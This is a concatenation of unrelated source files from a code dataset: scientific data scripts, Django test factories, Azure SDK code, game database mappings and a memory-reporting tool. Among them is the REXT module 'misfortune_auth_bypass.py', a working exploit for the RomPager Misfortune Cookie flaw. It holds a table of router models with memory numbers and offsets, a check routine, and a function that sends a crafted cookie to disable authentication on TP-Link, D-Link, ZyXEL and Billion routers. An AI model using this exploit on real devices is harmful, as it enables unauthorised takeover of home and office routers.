ftmp.write(u'' + h2_class[0].get_text() + '|')
ftmp.write(u'' + h2_class[1].get_text() + '\n')
# print table_tag
for x in xrange(1,_len):
data = tr_tags[x].get_text('|')
# print data
# url_ec = url.encode('unicode','utf-8')
ftmp.write(u'' + data + '\n')
count = count + 1
# close file
ftmp.close()
except Exception, e:
print e
# close file
ftmp.close()
def check_numline(filename):
urlsach_list = []
urlsach_file = open(filename, 'r')
for line in urlsach_file:
urlsach_list.append(line.strip())
_len = len(urlsach_list)
return _len
def getsttchuongthieu(sachi):
list_stt = []
urlsach = 'urlsach/sach' + str(sachi) + '.txt'
#kiem tra so dong cua url sach, tuong ung voi so chuong
numline = check_numline(urlsach)
fname = 'urlsach/data/partcomplete/sach' + str(sachi) + '.txt'
#doc data tu file sach data
data = open(fname).read()
#kiem tra xem moi dong trong file sach data da co chuong cac so nay chua
for i in xrange(1,numline + 1):
key = str(i)
# print ('da chay den day')
if key not in data:
list_stt.append(i)
return list_stt
def getlisturlchuongthieu(sachi):
list_chuongthieu = []
list_stt = getsttchuongthieu(sachi)
fname = 'urlsach/sach' + str(sachi) + '.txt'
fp = open(fname)
lines=fp.readlines()
for stt in list_stt:
list_chuongthieu.append(lines[stt-1])
return list_chuongthieu
def main():
for x in xrange(1,67):
#kiem tra xem duong dan co trong thu muc partcomplete hay khong
f2name = 'urlsach/data/partcomplete/sach' + str(x) + '.txt'
if os.path.isfile(f2name):
list_urlchuongthieu = getlisturlchuongthieu(x)
get_data(list_urlchuongthieu, x)
if __name__ == '__main__':
# driver = webdriver.Firefox()
driver.get("about:blank")
# open new tab
# body = driver.find_element_by_tag_name("body")
# body.send_keys(Keys.CONTROL + 't')
# time.sleep(15)
print('Nhap vao mot ky tu bat ky de tiep tuc chuong trinh')
key = raw_input()
main()
# close the tab
driver.find_element_by_tag_name('body').send_keys(Keys.COMMAND + 'w')
driver.close()
# urlchuong_list = ['http://www.transcripture.com/vietnamese-chinese-exodus-1.html']
# get_data(urlchuong_list, 2) | gpl-2.0 | -8,064,880,054,819,888,000 | 35.936842 | 282 | 0.619353 | false |
tonnrueter/pymca_devel | PyMca/EPDL97/GenerateEADLShellNonradiativeRates.py | 1 | 6235 | __doc__= "Generate specfiles with EADL97 shell transition probabilities"
import os
import sys
import EADLParser
Elements = ['H', 'He',
'Li', 'Be', 'B', 'C', 'N', 'O', 'F', 'Ne',
'Na', 'Mg', 'Al', 'Si', 'P', 'S', 'Cl', 'Ar',
'K', 'Ca', 'Sc', 'Ti', 'V', 'Cr', 'Mn', 'Fe',
'Co', 'Ni', 'Cu', 'Zn', 'Ga', 'Ge', 'As', 'Se',
'Br', 'Kr', 'Rb', 'Sr', 'Y', 'Zr', 'Nb', 'Mo',
'Tc', 'Ru', 'Rh', 'Pd', 'Ag', 'Cd', 'In', 'Sn',
'Sb', 'Te', 'I', 'Xe', 'Cs', 'Ba', 'La', 'Ce',
'Pr', 'Nd', 'Pm', 'Sm', 'Eu', 'Gd', 'Tb', 'Dy',
'Ho', 'Er', 'Tm', 'Yb', 'Lu', 'Hf', 'Ta', 'W',
'Re', 'Os', 'Ir', 'Pt', 'Au', 'Hg', 'Tl', 'Pb',
'Bi', 'Po', 'At', 'Rn', 'Fr', 'Ra', 'Ac', 'Th',
'Pa', 'U', 'Np', 'Pu', 'Am', 'Cm', 'Bk', 'Cf',
'Es', 'Fm', 'Md', 'No', 'Lr', 'Rf', 'Db', 'Sg',
'Bh', 'Hs', 'Mt']
def getHeader(filename):
text = '#F %s\n' % filename
text += '#U00 This file is a conversion to specfile format of \n'
text += '#U01 directly extracted EADL97 nonradiative transition probabilities.\n'
text += '#U02 EADL itself can be found at:\n'
text += '#U03 http://www-nds.iaea.org/epdl97/libsall.htm\n'
text += '#U04 The code used to generate this file has been:\n'
text += '#U05 %s\n' % os.path.basename(__file__)
text += '#U06\n'
text += '\n'
return text
shellList = EADLParser.getBaseShellList()
workingShells = ['K', 'L1', 'L2', 'L3', 'M1', 'M2', 'M3', 'M4', 'M5']
for shell in workingShells:
fname = "EADL97_%sShellNonradiativeRates.dat" % shell[0]
print("fname = %s" % fname)
if shell in ['K', 'L1', 'M1']:
if os.path.exists(fname):
os.remove(fname)
nscan = 0
outfile = open(fname, 'wb')
tmpText = getHeader(fname)
if sys.version < '3.0':
outfile.write(tmpText)
else:
outfile.write(tmpText.encode('UTF-8'))
nscan += 1
for i in range(1,101):
print("Z = %d, Element = %s" % (i, Elements[i-1]))
element = Elements[i-1]
ddict = {}
for key0 in shellList:
tmpKey = key0.split()[0]
if tmpKey in workingShells:
if workingShells.index(tmpKey) <= workingShells.index(shell):
continue
for key1 in shellList:
tmpKey = key1.split()[0]
if tmpKey in workingShells:
if workingShells.index(tmpKey) <= workingShells.index(shell):
continue
key = "%s-%s%s" % (shell, key0.split()[0], key1.split()[0])
if shell in [key0.split()[0], key1.split()[0]]:
continue
ddict[key] = [0.0, 0.0]
try:
ddict = EADLParser.getNonradiativeTransitionProbabilities(\
Elements.index(element)+1,
shell=shell)
print("%s Shell nonradiative emission probabilities " % shell)
except IOError:
#This happens when reading elements not presenting the transitions
pass
#continue
if i == 1:
#generate the labels
nTransitions = 0
tmpText = '#L Z TOTAL'
for key0 in workingShells:
tmpKey = key0.split()[0]
if tmpKey in workingShells:
if workingShells.index(tmpKey) <= workingShells.index(shell):
continue
for key1 in shellList:
tmpKey = key1.split()[0]
if tmpKey in workingShells:
if workingShells.index(tmpKey) <= workingShells.index(shell):
continue
key = "%s-%s%s" % (shell, key0.split()[0], key1.split()[0])
tmpText += ' %s' % (key)
nTransitions += 1
text = '#S %d %s-Shell nonradiative rates\n' % (nscan, shell)
text += '#N %d\n' % (2 + nTransitions)
text += tmpText + '\n'
else:
text = ''
# this loop calculates the totals, because it cannot be deduced from the subset
# transitions written in the file
total = 0.0
for key0 in shellList:
tmpKey = key0.split()[0]
if tmpKey in workingShells:
if workingShells.index(tmpKey) <= workingShells.index(shell):
continue
for key1 in shellList:
tmpKey = key1.split()[0]
if tmpKey in workingShells:
if workingShells.index(tmpKey) <= workingShells.index(shell):
continue
key = "%s-%s%s" % (shell, key0.split()[0], key1.split()[0])
total += ddict.get(key, [0.0, 0.0])[0]
text += '%d %.7E' % (i, total)
for key0 in workingShells:
tmpKey = key0.split()[0]
if tmpKey in workingShells:
if workingShells.index(tmpKey) <= workingShells.index(shell):
continue
for key1 in shellList:
tmpKey = key1.split()[0]
if tmpKey in workingShells:
if workingShells.index(tmpKey) <= workingShells.index(shell):
continue
key = "%s-%s%s" % (shell, key0.split()[0], key1.split()[0])
valueToWrite = ddict.get(key, [0.0, 0.0])[0]
if valueToWrite == 0.0:
text += ' 0.0'
else:
text += ' %.7E' % valueToWrite
text += '\n'
if sys.version < '3.0':
outfile.write(text)
else:
outfile.write(text.encode('UTF-8'))
if sys.version < '3.0':
outfile.write('\n')
else:
outfile.write('\n'.encode('UTF-8'))
if sys.version < '3.0':
outfile.write('\n')
else:
outfile.write('\n'.encode('UTF-8'))
outfile.close()
| gpl-2.0 | 4,806,273,130,956,564,000 | 42.601399 | 87 | 0.455654 | false |
mangaki/mangaki | mangaki/mangaki/factories.py | 1 | 1591 | import factory
from factory.django import DjangoModelFactory, mute_signals
from .models import Profile, Work, Category
from django.contrib.auth.models import User
from django.db.models.signals import post_save
class ProfileFactory(DjangoModelFactory):
class Meta:
model = Profile
user = factory.SubFactory('mangaki.factories.UserFactory', profile=None)
mal_username = factory.Faker('user_name')
is_shared = factory.Faker('boolean')
nsfw_ok = factory.Faker('boolean')
newsletter_ok = factory.Faker('boolean')
avatar_url = factory.LazyAttribute(lambda o: '{}{}.png'.format(factory.Faker('url').generate({}), o.mal_username))
@mute_signals(post_save)
class UserFactory(DjangoModelFactory):
class Meta:
model = User
username = factory.Faker('user_name')
email = factory.LazyAttribute(lambda o: '{}@mangaki.fr'.format(o.username))
profile = factory.RelatedFactory(ProfileFactory, 'user')
class WorkFactory(DjangoModelFactory):
class Meta:
model = Work
category = factory.Iterator(Category.objects.all())
@factory.iterator
def title():
qs = Work.objects.values_list('title', flat=True).all()[:20]
for title in qs:
yield title
nsfw = factory.Faker('boolean')
synopsis = factory.Faker('text')
def create_user(**kwargs):
return UserFactory.create(**kwargs)
def create_user_with_profile(**kwargs):
profile = kwargs.pop('profile')
user = create_user(**kwargs)
for key, value in profile.items():
setattr(user.profile, key, value)
return user
| agpl-3.0 | -2,614,688,259,151,753,700 | 29.018868 | 118 | 0.688875 | false |
Azure/azure-sdk-for-python | sdk/databoxedge/azure-mgmt-databoxedge/azure/mgmt/databoxedge/v2019_08_01/operations/_jobs_operations.py | 1 | 4882 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Optional, TypeVar
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class JobsOperations(object):
"""JobsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.databoxedge.v2019_08_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def get(
self,
device_name, # type: str
name, # type: str
resource_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.Job"
"""Gets the details of a specified job on a Data Box Edge/Data Box Gateway device.
Gets the details of a specified job on a Data Box Edge/Data Box Gateway device.
:param device_name: The device name.
:type device_name: str
:param name: The job name.
:type name: str
:param resource_group_name: The resource group name.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Job, or the result of cls(response)
:rtype: ~azure.mgmt.databoxedge.v2019_08_01.models.Job
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Job"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-08-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'deviceName': self._serialize.url("device_name", device_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('Job', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataBoxEdge/dataBoxEdgeDevices/{deviceName}/jobs/{name}'} # type: ignore
| mit | -2,191,556,967,445,919,200 | 43.381818 | 188 | 0.65383 | false |
j91321/rext | modules/exploits/allegrosoft/misfortune_auth_bypass.py | 1 | 22767 | # Name:Misfortune Cookie vulnerability authentication bypass
# File:misfortune_auth_bypass.py
# Author:Ján Trenčanský
# License: GNU GPL v3
# Created: 22.9.2016
# Description: PoC based on 31C3 presentation,
# exploit based on Marcin Bury and Milad Doorbash routersploit module.
import core.Exploit
import interface.utils
from core.io import query_yes_no
from interface.messages import print_failed, print_success, print_warning, print_error, print_info, print_help
import requests
import requests.exceptions
import re
class Exploit(core.Exploit.RextExploit):
"""
Name:Misfortune Cookie vulnerability authentication bypass
File:misfortune_auth_bypass.py
Author:Ján Trenčanský
License: GNU GPL v3
Created: 4.2.2014
Description: PoC based on 31C3 presentation, exploit based on Marcin Bury and Milad Doorbash routersploit module.
Options:
Name Description
host Target host address
port Target port
model Target model
"""
devices = None
number = None
offset = None
def __init__(self):
# This part is directly taken from routersploit module
self.devices = [
# brand # model # firmware
{'name': "Azmoon AZ-D140W 2.11.89.0(RE2.C29)3.11.11.52_PMOFF.1", 'number': 107367693,
'offset': 13}, # 0x803D5A79 # tested
{'name': "Billion BiPAC 5102S Av2.7.0.23 (UE0.B1C)", 'number': 107369694, 'offset': 13},
# 0x8032204d # ----------
{'name': "Billion BiPAC 5102S Bv2.7.0.23 (UE0.B1C)", 'number': 107369694, 'offset': 13},
# 0x8032204d # ----------
{'name': "Billion BiPAC 5200 2.11.84.0(UE2.C2)3.11.11.6", 'number': 107369545,
'offset': 9}, # 0x803ec2ad # ----------
{'name': "Billion BiPAC 5200 2_11_62_2_ UE0.C2D_3_10_16_0", 'number': 107371218,
'offset': 21}, # 0x803c53e5 # ----------
{'name': "Billion BiPAC 5200A 2_10_5 _0(RE0.C2)3_6_0_0", 'number': 107366366,
'offset': 25}, # 0x8038a6e1 # ----------
{'name': "Billion BiPAC 5200A 2_11_38_0 (RE0.C29)3_10_5_0", 'number': 107371453,
'offset': 9}, # 0x803b3a51 # ----------
{'name': "Billion BiPAC 5200GR4 2.11.91.0(RE2.C29)3.11.11.52", 'number': 107367690,
'offset': 21}, # 0x803D8A51 # tested
{'name': "Billion BiPAC 5200SRD 2.10.5.0 (UE0.C2C) 3.6.0.0", 'number': 107368270,
'offset': 1}, # 0x8034b109 # ----------
{'name': "Billion BiPAC 5200SRD 2.12.17.0_UE2.C3_3.12.17.0", 'number': 107371378,
'offset': 37}, # 0x8040587d # ----------
{'name': "Billion BiPAC 5200SRD 2_11_62_2(UE0.C3D)3_11_11_22", 'number': 107371218,
'offset': 13}, # 0x803c49d5 # ----------
{'name': "D-Link DSL-2520U Z1 1.08 DSL-2520U_RT63261_Middle_East_ADSL",
'number': 107368902, 'offset': 25}, # 0x803fea01 # tested
{'name': "D-Link DSL-2600U Z1_DSL-2600U", 'number': 107366496, 'offset': 13},
# 0x8040637d # ----------
{'name': "D-Link DSL-2600U Z2_V1.08_ras", 'number': 107360133, 'offset': 20},
# 0x803389B0 # ----------
{'name': "TP-Link TD-8616 V2_080513", 'number': 107371483, 'offset': 21},
# 0x80397055 # ----------
{'name': "TP-Link TD-8816 V4_100528_Russia", 'number': 107369790, 'offset': 17},
# 0x803ae0b1 # ----------
{'name': "TP-Link TD-8816 V4_100524", 'number': 107369790, 'offset': 17},
# 0x803ae0b1 # ----------
{'name': "TP-Link TD-8816 V5_100528_Russia", 'number': 107369790, 'offset': 17},
# 0x803ae0b1 # ----------
{'name': "TP-Link TD-8816 V5_100524", 'number': 107369790, 'offset': 17},
# 0x803ae0b1 # tested
{'name': "TP-Link TD-8816 V5_100903", 'number': 107369790, 'offset': 17},
# 0x803ae0b1 # ----------
{'name': "TP-Link TD-8816 V6_100907", 'number': 107371426, 'offset': 17},
# 0x803c6e09 # ----------
{'name': "TP-Link TD-8816 V7_111103", 'number': 107371161, 'offset': 1},
# 0x803e1bd5 # ----------
{'name': "TP-Link TD-8816 V7_130204", 'number': 107370211, 'offset': 5},
# 0x80400c85 # ----------
{'name': "TP-Link TD-8817 V5_100524", 'number': 107369790, 'offset': 17},
# 0x803ae0b1 # ----------
{'name': "TP-Link TD-8817 V5_100702_TR", 'number': 107369790, 'offset': 17},
# 0x803ae0b1 # ----------
{'name': "TP-Link TD-8817 V5_100903", 'number': 107369790, 'offset': 17},
# 0x803ae0b1 # ----------
{'name': "TP-Link TD-8817 V6_100907", 'number': 107369788, 'offset': 1},
# 0x803b6e09 # ----------
{'name': "TP-Link TD-8817 V6_101221", 'number': 107369788, 'offset': 1},
# 0x803b6e09 # ----------
{'name': "TP-Link TD-8817 V7_110826", 'number': 107369522, 'offset': 25},
# 0x803d1bd5 # ----------
{'name': "TP-Link TD-8817 V7_130217", 'number': 107369316, 'offset': 21},
# 0x80407625 # ----------
{'name': "TP-Link TD-8817 V7_120509", 'number': 107369321, 'offset': 9},
# 0x803fbcc5 # tested
{'name': "TP-Link TD-8817 V8_140311", 'number': 107351277, 'offset': 20},
# 0x8024E148 # tested
{'name': "TP-Link TD-8820 V3_091223", 'number': 107369768, 'offset': 17},
# 0x80397E69 # tested
{'name': "TP-Link TD-8840T V1_080520", 'number': 107369845, 'offset': 5},
# 0x80387055 # ----------
{'name': "TP-Link TD-8840T V2_100525", 'number': 107369790, 'offset': 17},
# 0x803ae0b1 # tested
{'name': "TP-Link TD-8840T V2_100702_TR", 'number': 107369790, 'offset': 17},
# 0x803ae0b1 # ----------
{'name': "TP-Link TD-8840T V2_090609", 'number': 107369570, 'offset': 1},
# 0x803c65d5 # ----------
{'name': "TP-Link TD-8840T V3_101208", 'number': 107369766, 'offset': 17},
# 0x803c3e89 # tested
{'name': "TP-Link TD-8840T V3_110221", 'number': 107369764, 'offset': 5},
# 0x803d1a09 # ----------
{'name': "TP-Link TD-8840T V3_120531", 'number': 107369688, 'offset': 17},
# 0x803fed35 # ----------
{'name': "TP-Link TD-W8101G V1_090107", 'number': 107367772, 'offset': 37},
# 0x803bf701 # ----------
{'name': "TP-Link TD-W8101G V1_090107", 'number': 107367808, 'offset': 21},
# 0x803e5b6d # ----------
{'name': "TP-Link TD-W8101G V2_100819", 'number': 107367751, 'offset': 21},
# 0x803dc701 # ----------
{'name': "TP-Link TD-W8101G V2_101015_TR", 'number': 107367749, 'offset': 13},
# 0x803e1829 # ----------
{'name': "TP-Link TD-W8101G V2_101101", 'number': 107367749, 'offset': 13},
# 0x803e1829 # ----------
{'name': "TP-Link TD-W8101G V3_110119", 'number': 107367765, 'offset': 25},
# 0x804bb941 # ----------
{'name': "TP-Link TD-W8101G V3_120213", 'number': 107367052, 'offset': 25},
# 0x804e1ff9 # ----------
{'name': "TP-Link TD-W8101G V3_120604", 'number': 107365835, 'offset': 1},
# 0x804f16a9 # ----------
{'name': "TP-Link TD-W8151N V3_120530", 'number': 107353867, 'offset': 24},
# 0x8034F3A4 # tested
{'name': "TP-Link TD-W8901G V1_080522", 'number': 107367787, 'offset': 21},
# 0x803AB30D # tested
{'name': "TP-Link TD-W8901G V1,2_080522", 'number': 107368013, 'offset': 5},
# 0x803AB30D # ----------
{'name': "TP-Link TD-W8901G V2_090113_Turkish", 'number': 107368013, 'offset': 5},
# 0x803AB30D # ----------
{'name': "TP-Link TD-W8901G V3_140512", 'number': 107367854, 'offset': 9},
# 0x803cf335 # tested
{'name': "TP-Link TD-W8901G V3_100603", 'number': 107367751, 'offset': 21},
# 0x803DC701 # tested
{'name': "TP-Link TD-W8901G V3_100702_TR", 'number': 107367751, 'offset': 21},
# 0x803DC701 # tested
{'name': "TP-Link TD-W8901G V3_100901", 'number': 107367749, 'offset': 13},
# 0x803E1829 # tested
{'name': "TP-Link TD-W8901G V6_110119", 'number': 107367765, 'offset': 25},
# 0x804BB941 # tested
{'name': "TP-Link TD-W8901G V6_110915", 'number': 107367682, 'offset': 21},
# 0x804D7CB9 # tested
{'name': "TP-Link TD-W8901G V6_120418", 'number': 107365835, 'offset': 1},
# 0x804F16A9 # ----------
{'name': "TP-Link TD-W8901G V6_120213", 'number': 107367052, 'offset': 25},
# 0x804E1FF9 # ----------
{'name': "TP-Link TD-W8901GB V3_100727", 'number': 107367756, 'offset': 13},
# 0x803dfbe9 # ----------
{'name': "TP-Link TD-W8901GB V3_100820", 'number': 107369393, 'offset': 21},
# 0x803f1719 # ----------
{'name': "TP-Link TD-W8901N V1_111211", 'number': 107353880, 'offset': 0},
# 0x8034FF94 # tested
{'name': "TP-Link TD-W8951ND V1_101124,100723,100728", 'number': 107369839, 'offset': 25},
# 0x803d2d61 # tested
{'name': "TP-Link TD-W8951ND V1_110907", 'number': 107369876, 'offset': 13},
# 0x803d6ef9 # ----------
{'name': "TP-Link TD-W8951ND V1_111125", 'number': 107369876, 'offset': 13},
# 0x803d6ef9 # ----------
{'name': "TP-Link TD-W8951ND V3.0_110729_FI", 'number': 107366743, 'offset': 21},
# 0x804ef189 # ----------
{'name': "TP-Link TD-W8951ND V3_110721", 'number': 107366743, 'offset': 21},
# 0x804ee049 # ----------
{'name': "TP-Link TD-W8951ND V3_20110729_FI", 'number': 107366743, 'offset': 21},
# 0x804ef189 # ----------
{'name': "TP-Link TD-W8951ND V4_120511", 'number': 107364759, 'offset': 25},
# 0x80523979 # tested
{'name': "TP-Link TD-W8951ND V4_120607", 'number': 107364759, 'offset': 13},
# 0x80524A91 # tested
{'name': "TP-Link TD-W8951ND V4_120912_FL", 'number': 107364760, 'offset': 21},
# 0x80523859 # tested
{'name': "TP-Link TD-W8961NB V1_110107", 'number': 107369844, 'offset': 17},
# 0x803de3f1 # tested
{'name': "TP-Link TD-W8961NB V1_110519", 'number': 107369844, 'offset': 17},
# 0x803de3f1 # ----------
{'name': "TP-Link TD-W8961NB V2_120319", 'number': 107367629, 'offset': 21},
# 0x80531859 # ----------
{'name': "TP-Link TD-W8961NB V2_120823", 'number': 107366421, 'offset': 13},
# 0x80542e59 # ----------
{'name': "TP-Link TD-W8961ND V1_100722,101122", 'number': 107369839, 'offset': 25},
# 0x803D2D61 # tested
{'name': "TP-Link TD-W8961ND V1_101022_TR", 'number': 107369839, 'offset': 25},
# 0x803D2D61 # ----------
{'name': "TP-Link TD-W8961ND V1_111125", 'number': 107369876, 'offset': 13},
# 0x803D6EF9 # ----------
{'name': "TP-Link TD-W8961ND V2_120427", 'number': 107364732, 'offset': 25},
# 0x8052e0e9 # ----------
{'name': "TP-Link TD-W8961ND V2_120710_UK", 'number': 107364771, 'offset': 37},
# 0x80523AA9 # ----------
{'name': "TP-Link TD-W8961ND V2_120723_FI", 'number': 107364762, 'offset': 29},
# 0x8052B6B1 # ----------
{'name': "TP-Link TD-W8961ND V3_120524,120808", 'number': 107353880, 'offset': 0},
# 0x803605B4 # ----------
{'name': "TP-Link TD-W8961ND V3_120830", 'number': 107353414, 'offset': 36},
# 0x803605B4 # ----------
{'name': "ZyXEL P-660R-T3 3.40(BOQ.0)C0", 'number': 107369567, 'offset': 21},
# 0x803db071 # tested
{'name': "ZyXEL P-660RU-T3 3.40(BJR.0)C0", 'number': 107369567, 'offset': 21},
# 0x803db071
]
core.Exploit.RextExploit.__init__(self)
def do_list(self, e):
counter = 0
print_info("ID\tManufacturer\tModel\tFirmware")
for device in self.devices:
print_info("%d %s" % (counter, self.devices[counter]['name']))
counter += 1
def do_set(self, e):
args = e.split(' ')
try:
if args[0] == "host":
if interface.utils.validate_ipv4(args[1]):
self.host = args[1]
else:
print_error("Please provide valid IPv4 address")
elif args[0] == "port":
if str.isdigit(args[1]):
self.port = args[1]
else:
print_error("Port value must be integer")
elif args[0] == 'device':
if not str.isdigit(args[1]):
print_error("Invalid device ID")
elif int(args[1]) < 0 or int(args[1]) > len(self.devices):
print_error("Invalid device ID")
else:
index = int(args[1])
print_info("Device: %s" % self.devices[index]['name'])
self.number = self.devices[index]['number']
print_info("Setting address to: %d" % self.number)
self.offset = self.devices[index]['offset']
print_info("Setting offset: %d" % self.offset)
except IndexError:
print_error("please specify value for variable")
def check(self):
user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)'
headers = {'User-Agent': user_agent,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q,0.3',
'Connection': 'keep-alive',
'Accept-Encoding': 'gzip, deflate',
'Cache-Control': 'no-cache',
'Cookie': 'C107373883=/omg1337hax'}
target = 'http://' + self.host + ":" + self.port + '/blabla'
try:
response = requests.get(target, headers=headers, timeout=60)
if response.status_code != 404:
print_failed("Unexpected HTTP status, expecting 404 got: %d" % response.status_code)
print_warning("Device is not running RomPager")
else:
if 'server' in response.headers:
server = response.headers.get('server')
if re.search('RomPager', server) is not None:
print_success("Got RomPager! Server:%s" % server)
if re.search('omg1337hax', response.text) is not None:
print_success("Device is vulnerable to misfortune cookie")
return True
else:
print_failed("Test didn't pass.")
print_warning("Device MAY still be vulnerable")
return False
else:
print_failed("RomPager not detected, device is running: %s " % server)
return False
else:
print_failed("Not running RomPager")
return False
except requests.exceptions.Timeout:
print_error("Timeout!")
except requests.exceptions.ConnectionError:
print_error("No route to host")
def auth_bypass(self):
user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)'
headers = {'User-Agent': user_agent,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q,0.3',
'Connection': 'keep-alive',
'Accept-Encoding': 'gzip, deflate',
'Cache-Control': 'no-cache',
'Cookie': 'C' + str(self.number) + '=' + 'B' * self.offset + '\x00'}
target = 'http://' + self.host + ":" + self.port
try:
response = requests.get(target, headers=headers, timeout=60)
if response is not None and response.status_code <= 302:
print_success("Exploit sent, please check http://%s:%s authentication should be disabled"
% (self.host, self.port))
else:
print_error("Exploit failed")
except requests.exceptions.Timeout:
print_error("Timeout!")
except requests.exceptions.ConnectionError:
print_error("No route to host")
def do_run(self, e):
# First check with the same code as in misfortune cookie scanner
is_vulnerable = self.check()
if self.offset is None:
print_error("Please set device model by running set device id")
if is_vulnerable:
self.auth_bypass()
else:
if query_yes_no("Check indicates device is not vulnerable, would you like to try the exploit anyway?",
default="no"):
self.auth_bypass()
def help_list(self):
print_help("List all available devices")
Exploit()
| gpl-3.0 | 3,007,073,380,054,384,600 | 67.972727 | 120 | 0.39326 | false |
Ebag333/Pyfa | eos/db/gamedata/effect.py | 1 | 2320 | # ===============================================================================
# Copyright (C) 2010 Diego Duclos
#
# This file is part of eos.
#
# eos is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# eos is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with eos. If not, see <http://www.gnu.org/licenses/>.
# ===============================================================================
from sqlalchemy import Column, String, Integer, Boolean, Table, ForeignKey
from sqlalchemy.ext.associationproxy import association_proxy
from sqlalchemy.orm import mapper, synonym, relation, deferred
from eos.db import gamedata_meta
from eos.types import Effect, EffectInfo
typeeffects_table = Table("dgmtypeeffects", gamedata_meta,
Column("typeID", Integer, ForeignKey("invtypes.typeID"), primary_key=True, index=True),
Column("effectID", Integer, ForeignKey("dgmeffects.effectID"), primary_key=True))
effects_table = Table("dgmeffects", gamedata_meta,
Column("effectID", Integer, primary_key=True),
Column("effectName", String),
Column("description", String),
Column("published", Boolean),
Column("isAssistance", Boolean),
Column("isOffensive", Boolean))
mapper(EffectInfo, effects_table,
properties={"ID": synonym("effectID"),
"name": synonym("effectName"),
"description": deferred(effects_table.c.description)})
mapper(Effect, typeeffects_table,
properties={"ID": synonym("effectID"),
"info": relation(EffectInfo, lazy=False)})
Effect.name = association_proxy("info", "name")
Effect.description = association_proxy("info", "description")
Effect.published = association_proxy("info", "published")
| gpl-3.0 | -5,116,466,407,913,318,000 | 45.4 | 113 | 0.625 | false |
dwayne-randle-sr/various-snippets | centos/6/usr/local/bin/ps_mem.py | 1 | 17569 | #!/usr/bin/env python
# Try to determine how much RAM is currently being used per program.
# Note per _program_, not per process. So for example this script
# will report RAM used by all httpd process together. In detail it reports:
# sum(private RAM for program processes) + sum(Shared RAM for program processes)
# The shared RAM is problematic to calculate, and this script automatically
# selects the most accurate method available for your kernel.
# Licence: LGPLv2
# Author: [email protected]
# Source: http://www.pixelbeat.org/scripts/ps_mem.py
# V1.0 06 Jul 2005 Initial release
# V1.1 11 Aug 2006 root permission required for accuracy
# V1.2 08 Nov 2006 Add total to output
# Use KiB,MiB,... for units rather than K,M,...
# V1.3 22 Nov 2006 Ignore shared col from /proc/$pid/statm for
# 2.6 kernels up to and including 2.6.9.
# There it represented the total file backed extent
# V1.4 23 Nov 2006 Remove total from output as it's meaningless
# (the shared values overlap with other programs).
# Display the shared column. This extra info is
# useful, especially as it overlaps between programs.
# V1.5 26 Mar 2007 Remove redundant recursion from human()
# V1.6 05 Jun 2007 Also report number of processes with a given name.
# Patch from [email protected]
# V1.7 20 Sep 2007 Use PSS from /proc/$pid/smaps if available, which
# fixes some over-estimation and allows totalling.
# Enumerate the PIDs directly rather than using ps,
# which fixes the possible race between reading
# RSS with ps, and shared memory with this program.
# Also we can show non truncated command names.
# V1.8 28 Sep 2007 More accurate matching for stats in /proc/$pid/smaps
# as otherwise could match libraries causing a crash.
# Patch from [email protected]
# V1.9 20 Feb 2008 Fix invalid values reported when PSS is available.
# Reported by Andrey Borzenkov <[email protected]>
# V3.3 24 Jun 2014
